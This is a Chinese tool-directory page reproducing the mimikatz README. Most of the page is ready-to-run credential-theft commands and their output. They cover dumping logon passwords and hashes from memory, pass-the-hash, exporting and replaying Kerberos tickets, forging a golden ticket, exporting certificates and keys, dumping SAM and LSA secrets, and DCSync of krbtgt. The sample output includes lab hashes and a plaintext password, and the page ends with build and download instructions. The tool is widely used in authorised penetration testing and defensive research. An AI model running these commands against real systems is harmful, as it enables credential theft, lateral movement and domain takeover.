Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
mimikatz — 用于从内存中提取 Windows 凭据(密码、哈希、Kerberos 票据)并执行哈希传递(Pass-the-Hash)、票据传递(Pass-the-Ticket)和黄金票据(Golden Ticket)攻击的工具。 | Kitploit
工具/GitHubGitHub/parrotsec/mimikatz
权限提升内存取证密码攻击漏洞利用横向移动渗透测试身份验证红队
GitHubparrotsec/mimikatz

mimikatz

用于从内存中提取 Windows 凭据(密码、哈希、Kerberos 票据)并执行哈希传递(Pass-the-Hash)、票据传递(Pass-the-Ticket)和黄金票据(Golden Ticket)攻击的工具。

查看仓库
2.6k35642年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

mimikatz

mimikatz 是我为了学习 C 语言并进行一些 Windows 安全实验而编写的工具。

它如今以从内存中提取明文密码、哈希、PIN 码和 Kerberos 票据而闻名。mimikatz 还可以执行哈希传递(pass-the-hash)、票据传递(pass-the-ticket)或构建_黄金票据(Golden tickets)_。

root@kitploit:~
  .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr  6 2014 22:02:03)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                    with  13 modules * * */


mimikatz # privilege::debug
Privilege '20' OK
 
mimikatz # sekurlsa::logonpasswords
 
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session           : Interactive from 2
User Name         : Gentil Kiwi
Domain            : vm-w7-ult-x
SID               : S-1-5-21-1982681256-1210654043-1600862990-1000
        msv :
         [00000003] Primary
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * Password : waza1234/
...

但这还不是全部!Crypto、Terminal Server、Events……GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki 或 http://blog.gentilkiwi.com(法语,_是的_)上有大量信息。

如果你不想自行编译,可以在 https://github.com/gentilkiwi/mimikatz/releases 获取现成的二进制文件。

快速使用

root@kitploit:~
log
privilege::debug

sekurlsa

root@kitploit:~
sekurlsa::logonpasswords
sekurlsa::tickets /export

sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

kerberos

root@kitploit:~
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi

kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi

crypto

root@kitploit:~
crypto::capi
crypto::cng

crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE

crypto::keys /export
crypto::keys /machine /export

vault & lsadump

root@kitploit:~
vault::cred
vault::list

token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert

lsadump::dcsync /user:domain\krbtgt /domain:lab.local

编译

mimikatz 以 Visual Studio 解决方案和 WinDDK 驱动程序(对于主要操作是可选的)的形式提供,因此先决条件是:

  • 对于 mimikatz 和 mimilib:Visual Studio 2010、2012 或 2013 Desktop 版(2013 Express for Desktop 免费且支持 x86 和 x64 - http://www.microsoft.com/download/details.aspx?id=44914)
  • 对于 mimikatz 驱动程序、mimilove(以及 ddk2003 平台):Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800

mimikatz 使用 SVN 进行源代码管理,但现在也支持 GIT! 你可以使用任何你想要的工具进行同步,甚至是 Visual Studio 2013 内置的 GIT =)

同步!

  • GIT URL:https://github.com/gentilkiwi/mimikatz.git
  • SVN URL:https://github.com/gentilkiwi/mimikatz/trunk
  • ZIP 文件:https://github.com/gentilkiwi/mimikatz/archive/master.zip

编译解决方案

  • 打开解决方案后,执行 Build / Build Solution(你可以更改架构)
  • mimikatz 现已编译完成,可以直接使用了!(Win32 / x64,运气好的话甚至支持 ARM64)
    • 你可能会遇到关于 _build_.cmd 和 mimidrv 的 MSB3073 错误,这是因为没有 Windows Driver Kit 7.1 (WinDDK) 就无法编译驱动程序,但 mimikatz 和 mimilib 都没有问题。

ddk2003

通过这个可选的 MSBuild 平台,你可以使用 WinDDK 编译工具以及默认的 msvcrt 运行时(生成的二进制文件更小,无依赖)。

对于这个可选平台,Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 和 Visual Studio 2010 是必需的,即使你之后打算使用 Visual Studio 2012 或 2013。

按照以下说明操作:

  • http://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme
  • http://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader

许可证

CC BY 4.0 许可证 - https://creativecommons.org/licenses/by/4.0/

mimikatz 的开发需要咖啡:

  • PayPal:https://www.paypal.me/delpy/

作者

  • Benjamin DELPY gentilkiwi,你可以通过 Twitter(@gentilkiwi)或邮件(benjamin [at] gentilkiwi.com)联系我
  • lsadump 模块中的 DCSync 和 DCShadow 功能是与 Vincent LE TOUX 共同编写的,你可以通过邮件(vincent.letoux [at] gmail.com)联系他,或访问他的网站(http://www.mysmartlogon.com)

这是一个个人开发项目,请尊重其理念,不要将其用于不法用途!

下载工具